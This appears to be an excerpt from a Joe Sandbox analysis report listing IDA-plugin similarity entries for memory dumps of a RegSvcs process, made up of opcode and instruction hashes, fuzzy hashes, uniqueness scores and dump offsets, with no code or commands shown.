                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d5b5f08e7943dc836481750f2ef45bad054d6937ade9e19134407eaf640f6adc
                                                  • Instruction ID: 055177624d0f2a808f571920829fddc3447676f26082057a28a4181d80fca105
                                                  • Opcode Fuzzy Hash: d5b5f08e7943dc836481750f2ef45bad054d6937ade9e19134407eaf640f6adc
                                                  • Instruction Fuzzy Hash: B2914030F0220A8FDB54DB65D9507AEB7B2FFC4640F208569D80AEB344EB74ED428B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df73687ab74ea26160252708a57da97fbbbd2e50e3783900491c0112405afe1f
                                                  • Instruction ID: ee932f4394f7eb6686a58e6132c53ee56eabed9aee26e1305953a7b0ade4fe4a
                                                  • Opcode Fuzzy Hash: df73687ab74ea26160252708a57da97fbbbd2e50e3783900491c0112405afe1f
                                                  • Instruction Fuzzy Hash: 6961C171F102214BDF509A7EC880A6FBAE7AFC4220B155039E81EDB3A1DE65ED0287D1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe95cf815f3392486d00e44438f72ef994afce8f5414e0f2f5a46c8d8d08bab0
                                                  • Instruction ID: 47b38ad1236e22c18263b7eb3599d7f163ca2ad00cc63c2939cd5768b1e39af7
                                                  • Opcode Fuzzy Hash: fe95cf815f3392486d00e44438f72ef994afce8f5414e0f2f5a46c8d8d08bab0
                                                  • Instruction Fuzzy Hash: 92811834B113498BDF54DBA9D5547AEB7F3EF88304F208529D80ADB394EA34EC428B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c260b9f503e1470e8fea58b2533605dbc5c71b02c9ee213d12a097e5171e5588
                                                  • Instruction ID: 1d2dbd074d5d6706dbbd9c7e4d35f07db3bb3f59b69c978de7ed25dc557db501
                                                  • Opcode Fuzzy Hash: c260b9f503e1470e8fea58b2533605dbc5c71b02c9ee213d12a097e5171e5588
                                                  • Instruction Fuzzy Hash: 23811934B113498BDF54DBA9D5547AEB7F3EF88304F208429D80ADB394EA34EC428B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b95fd3f0ce64d8a2d6675da7169eb663eadfd5567b00f9d8e210408531d60112
                                                  • Instruction ID: 0f022ea8ea0efe9e8f84f99c8290ce24b0933c291a0cbf9d1550f7368704657f
                                                  • Opcode Fuzzy Hash: b95fd3f0ce64d8a2d6675da7169eb663eadfd5567b00f9d8e210408531d60112
                                                  • Instruction Fuzzy Hash: C4811974B113498BDF54DBA9D5547AEB7F3EF89304F208429D80ADB394EA34EC428B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87a8548e7c2b2a2665991e015953f45c357aeebf60c254c4afe765c9e79638e8
                                                  • Instruction ID: 64e4e0041f1f616e2e04d3bc0a0ff65ca817ec3fefda2ec0c4c47f379319d07a
                                                  • Opcode Fuzzy Hash: 87a8548e7c2b2a2665991e015953f45c357aeebf60c254c4afe765c9e79638e8
                                                  • Instruction Fuzzy Hash: 72913D34E107198BDF60DF68C890B9DB7B2FF89304F208699D549AB355DB70AA85CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43f970ce546aeca3fda238ed68763ef3a72d95213aececd6892bfce03f1f2370
                                                  • Instruction ID: 1d191509debfa53099622958fbce26e18fd651cb6a2538d5df70f4b76c68888b
                                                  • Opcode Fuzzy Hash: 43f970ce546aeca3fda238ed68763ef3a72d95213aececd6892bfce03f1f2370
                                                  • Instruction Fuzzy Hash: E3913E34E107198BDF60DF68C890B9DB7B2FF89304F208699D549AB355DB70AA85CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88560d5e434c759b6eb6aa15b6f1b66f1a2aeb7db1846374c764d42d6f8f940f
                                                  • Instruction ID: e77055478f4b038e750dac5ccff781fe91a6032b7fcc9d877f508ccf1be64138
                                                  • Opcode Fuzzy Hash: 88560d5e434c759b6eb6aa15b6f1b66f1a2aeb7db1846374c764d42d6f8f940f
                                                  • Instruction Fuzzy Hash: D9914E34E107198BDF60DF68C890B9DB7B2FF89304F208699D549AB355DB70AA85CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be9094f7c033d060dfbeaffba4a52bc68c8fb25f4ce01fbcce289f8da6f70007
                                                  • Instruction ID: da1f5afa4b5cb93e9661a18b39eb22509c5b0a998df86b8639d29ceaccd48e54
                                                  • Opcode Fuzzy Hash: be9094f7c033d060dfbeaffba4a52bc68c8fb25f4ce01fbcce289f8da6f70007
                                                  • Instruction Fuzzy Hash: D5914F34E107198BDF60DF68C890B9DB7B2FF89304F208699D549AB355DB70AA85CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ddf4afefbfcad79f89271b46c9dca7f732bd7b5a0c9c04fab994c5e7a1bf26ec
                                                  • Instruction ID: 460aecccbd968d31d3818b1bd66a932dfa5a44a83e1f2491012d8540a684c062
                                                  • Opcode Fuzzy Hash: ddf4afefbfcad79f89271b46c9dca7f732bd7b5a0c9c04fab994c5e7a1bf26ec
                                                  • Instruction Fuzzy Hash: 2C814D30B50259DFDB58DFA8C854BAE7BB6FF88700F2084A9E505DB394CA75AC419F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23bf33b307dae54f18859d969fc11c5da6add8b2bf1c58d63298205ae5272174
                                                  • Instruction ID: 05724867d72afb76bbbf36044783e5f4c0a5a510d3412075d1af6b15066d7364
                                                  • Opcode Fuzzy Hash: 23bf33b307dae54f18859d969fc11c5da6add8b2bf1c58d63298205ae5272174
                                                  • Instruction Fuzzy Hash: AF616074E402199FEF549BA9C4547AEBBF7EF88300F20852AE506EB394DA759C418F90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ecd8c7863a2afdc1854c97888be448c363463a0795f9ab661574474aaa7c9bb
                                                  • Instruction ID: e3d37e90e52754ba76fbbd20db0151131c90cac29b78ce1fa60bea99df66c17a
                                                  • Opcode Fuzzy Hash: 9ecd8c7863a2afdc1854c97888be448c363463a0795f9ab661574474aaa7c9bb
                                                  • Instruction Fuzzy Hash: 70513130B022459FDB54DB69D950BAE77F2FFC8744F208469D80ADB384EA35ED428B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 760939353e5ea625ade77de8187ca2b0cdcdc1cbc99650f718abd5f4e8fce40e
                                                  • Instruction ID: 7c4788ca9414ad0bb51f1cc2d95a48d11338ea04e3673ebdfd712c2c394fef0b
                                                  • Opcode Fuzzy Hash: 760939353e5ea625ade77de8187ca2b0cdcdc1cbc99650f718abd5f4e8fce40e
                                                  • Instruction Fuzzy Hash: 81513030B022458FDB94DB79D8507BE77F2EFC8640F208469D80ADB384EA35EC428B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a09824a99283c94d4024b7036bbebba524500a1461eb76a441121ecd775b2a56
                                                  • Instruction ID: 835503827afb60cd2ce8e589f7958b021924aa79ccd012985771411071b96732
                                                  • Opcode Fuzzy Hash: a09824a99283c94d4024b7036bbebba524500a1461eb76a441121ecd775b2a56
                                                  • Instruction Fuzzy Hash: 04414B75F107098FDB60CEA9D880AAFB7B6FB95214F20592AE216DB640D730B8458B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f46b05cadba589f56fc63062e72d6edf3ee13121a72b37be1524c9b906943fc1
                                                  • Instruction ID: 48367eec11c144b06eea83785ad10fe451add8c2665a07548efd943a5241ac88
                                                  • Opcode Fuzzy Hash: f46b05cadba589f56fc63062e72d6edf3ee13121a72b37be1524c9b906943fc1
                                                  • Instruction Fuzzy Hash: F5416E74F402499FEB55DBA9C814BAEBBF7EF88300F208529E505EB395DA749C418F90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d45165e0e7310c7b96b12fa508b7f753fd89c8395db32232e2421be119b1df0
                                                  • Instruction ID: 8921f524400cc33c23881983edf86dfb9ec4d81c2586eb23c5c7ef58a50922d8
                                                  • Opcode Fuzzy Hash: 0d45165e0e7310c7b96b12fa508b7f753fd89c8395db32232e2421be119b1df0
                                                  • Instruction Fuzzy Hash: FA415074F402489FEB55DBA9C4147AEBBF7EF88300F208529E505EB395DA749C418F90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1566bfe09b8b4c0521334db5bf88f651ae09e603c02f067adbf87c9186ca1024
                                                  • Instruction ID: f055ebaef72ba701682bb2a6d555f2f0020ae0e5e87bad379c6fb9f6415d00a4
                                                  • Opcode Fuzzy Hash: 1566bfe09b8b4c0521334db5bf88f651ae09e603c02f067adbf87c9186ca1024
                                                  • Instruction Fuzzy Hash: 24414F74E402499FEB559BA9C4147AEBBF7EF88300F208529E505EB394DA749C418B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c36a758f2f7c40c2730037a008a01ca13a69e1f3c2b11d733ff9bbc79c68f0c0
                                                  • Instruction ID: 7e0ba6431e1e40dac972fae93a00358eb07dfd3c040229f49267ddc2077dd453
                                                  • Opcode Fuzzy Hash: c36a758f2f7c40c2730037a008a01ca13a69e1f3c2b11d733ff9bbc79c68f0c0
                                                  • Instruction Fuzzy Hash: A2415E74F402499FEB55DBA9C414BAEBBF7EF88300F208529E505EB395DA749C418B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01c371073493f2eb8b4ebfa716e3694641c415d076325780e0c61838547f0ba5
                                                  • Instruction ID: e05ba66c38c4e4d249484e65508a773a79d2ccd4dd17004d2689462bf838e626
                                                  • Opcode Fuzzy Hash: 01c371073493f2eb8b4ebfa716e3694641c415d076325780e0c61838547f0ba5
                                                  • Instruction Fuzzy Hash: CE31BA70B113019FEB459B35D5602AE7BB3AF89754FA49868C002DF381DE35EC42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1f41b5174b9a0c1b56538be7b73caef52bbc55b294df7b158d0028d7bb526e0
                                                  • Instruction ID: 734c1917f0078b31cf836a1f15419d16c850555f9a532be23f56f36740520f7f
                                                  • Opcode Fuzzy Hash: b1f41b5174b9a0c1b56538be7b73caef52bbc55b294df7b158d0028d7bb526e0
                                                  • Instruction Fuzzy Hash: 2D319A70B013059FEB499A35D5246AE7AB3AF89754FA49868C406DF381EE31EC41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6679334dcca4984286ce5bd44730934e977811ac4c18186e1630f759570b9c39
                                                  • Instruction ID: c3f87606bcc672288937b79f121db30fb4792492449337e00ea3acb4530c6386
                                                  • Opcode Fuzzy Hash: 6679334dcca4984286ce5bd44730934e977811ac4c18186e1630f759570b9c39
                                                  • Instruction Fuzzy Hash: 00316D34E10315DBCB54CFA4D8546AEB7B2EF89300F10D52AE816EB380DB70AC42CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ae40c8cfad47b3beccfad7389abb0e58aa20739b3e3ecd3f0c964ce46d704c8
                                                  • Instruction ID: e572725e369af9d8ed5e0c485285d2dd2b782d4c91fe135ff598061911031d08
                                                  • Opcode Fuzzy Hash: 4ae40c8cfad47b3beccfad7389abb0e58aa20739b3e3ecd3f0c964ce46d704c8
                                                  • Instruction Fuzzy Hash: F1314B34E10356DBCB54CFA4D8546AEB7B2EF89304F10C52AE816EB390DB70AC42CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7bf2f2b539605d06178759b015f6ce101173b13549849eb661beac64073d17fe
                                                  • Instruction ID: 5d84ae903cde63fe57faa0df4c508602d196da47aece2593d40e61dfc0228c8e
                                                  • Opcode Fuzzy Hash: 7bf2f2b539605d06178759b015f6ce101173b13549849eb661beac64073d17fe
                                                  • Instruction Fuzzy Hash: AA313A34E10356DBCB54CFA5D8546AEB7B2EF89304F10C52AE916EB390EB70AC42CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d038106c642887bd79c1cd918524f065611e13a471c335e83138f7b55451493
                                                  • Instruction ID: c9f2f38a4a88cecfce8874ae79e6e6daafbe0d8fcc526fd7be6eafa841319440
                                                  • Opcode Fuzzy Hash: 7d038106c642887bd79c1cd918524f065611e13a471c335e83138f7b55451493
                                                  • Instruction Fuzzy Hash: 3E218DB5F423159FDF40DF69D950ABEBBF6EB48240F144029E905EB340E634ED458B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e183f5abcb23205e6b4e2b6df48942dc31eabfed76b8b7d6486c8ff79b9c1d74
                                                  • Instruction ID: 7362f5e2555baaa5bfb61cf458061597bc061f82b1f371c4af57e7377ae697ef
                                                  • Opcode Fuzzy Hash: e183f5abcb23205e6b4e2b6df48942dc31eabfed76b8b7d6486c8ff79b9c1d74
                                                  • Instruction Fuzzy Hash: 1A2169B9E023159FDF50DFA9D990AAEB7F6EB48250F148029E905EB340E634ED458B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 471464c94a75c54076e254127a692eef251260cf5242b2a8ce2398ab0b26276a
                                                  • Instruction ID: f9a204fb6b2ec13a14cb33b0ec1a6c6a892744f363b535183d4383561793b39e
                                                  • Opcode Fuzzy Hash: 471464c94a75c54076e254127a692eef251260cf5242b2a8ce2398ab0b26276a
                                                  • Instruction Fuzzy Hash: EE217AB5F023059FDF40CF69D940AAEBBF6EB48350F148029E905EB340E734E9458B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4629920493.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2ecd000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cd42df5cb5dd9f380abb3596b433b723c9fe37ab7e4c635ada9929f0634b038
                                                  • Instruction ID: 56890cf3a567e04a2288b47b98690649409d82d5889cf7294b37680ab79edfd8
                                                  • Opcode Fuzzy Hash: 8cd42df5cb5dd9f380abb3596b433b723c9fe37ab7e4c635ada9929f0634b038
                                                  • Instruction Fuzzy Hash: F521CF71644204EFDB14DF58DA81B26BBA6EB84328F34C56DD90A4A252C37BD847CA62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4629920493.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2ecd000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01cf1137b93b15f8f31bff273ebf490f5eeb3ed6ca36f47c278e51e3366db69a
                                                  • Instruction ID: 498975f0ad4b2a78a5322a83ec95982e7f576430742f42edcf6c10f9587fa98a
                                                  • Opcode Fuzzy Hash: 01cf1137b93b15f8f31bff273ebf490f5eeb3ed6ca36f47c278e51e3366db69a
                                                  • Instruction Fuzzy Hash: 10214D715493C49FC7038B64D990711BF71AB46214F29C5EBD8898F2A7C33A980ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9cc3769da7add8967ea4c3b78de72058ca690dd84869e15954255b4f4d2c76d4
                                                  • Instruction ID: 1fe8d15281bcc6b4cfa255d7a6cc52ecf404b55bbfba1919ee0865c6520eaf2e
                                                  • Opcode Fuzzy Hash: 9cc3769da7add8967ea4c3b78de72058ca690dd84869e15954255b4f4d2c76d4
                                                  • Instruction Fuzzy Hash: 0C21AC30B103149FDB94DA6DE8546AEB7B2EF84310F249439E406EB340DB35AC46CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c84e0ed9dd1905660168ace5669dab447ab35955a8270220aea260d8a89a6815
                                                  • Instruction ID: 407516b04b519f3b66c145f02abdcffdb11bcfed7f35adad3256a39e73ea52fd
                                                  • Opcode Fuzzy Hash: c84e0ed9dd1905660168ace5669dab447ab35955a8270220aea260d8a89a6815
                                                  • Instruction Fuzzy Hash: A1219030B113159FDF94DA6EE8546ADB7B6EF84310F149439E406EB340DB35AD45CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7893829c264866e9adaab5c9813cbec5597912a9797dae68d906e692e6810026
                                                  • Instruction ID: 34945c364b344fbb5819839b0d7241b0ee84bae1f4668c03e515c2aeb1aabc87
                                                  • Opcode Fuzzy Hash: 7893829c264866e9adaab5c9813cbec5597912a9797dae68d906e692e6810026
                                                  • Instruction Fuzzy Hash: 2D218C30B113149FDB94DA6DE8546AEBBB7EF84310F249479E406EB340DA35AD45CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54264960abbce53f96e3deba1db78715928afb7fffcc0aa291aad1bf3b064bcb
                                                  • Instruction ID: 3dee00dda1d46c191fb187e43408d07aa3f15e4c5e8959afba711e3292fdc8f7
                                                  • Opcode Fuzzy Hash: 54264960abbce53f96e3deba1db78715928afb7fffcc0aa291aad1bf3b064bcb
                                                  • Instruction Fuzzy Hash: 28110830F113054BDF649728EC507BAB3B6EF85354F200879D50ADB380EB35AE458B92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e175d470e85e2f8e392ba578a4f9346320fd1abd785906f8d554ae47e5eeaff
                                                  • Instruction ID: 5d5b2dd32b5b84335d5e265bf14545e9aead4509cdb8e4754105370c677de9f0
                                                  • Opcode Fuzzy Hash: 1e175d470e85e2f8e392ba578a4f9346320fd1abd785906f8d554ae47e5eeaff
                                                  • Instruction Fuzzy Hash: 73218C30B113149BDB94CA6DE8546AEB7B7EF84310F249439E406EB380DA35AC46CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
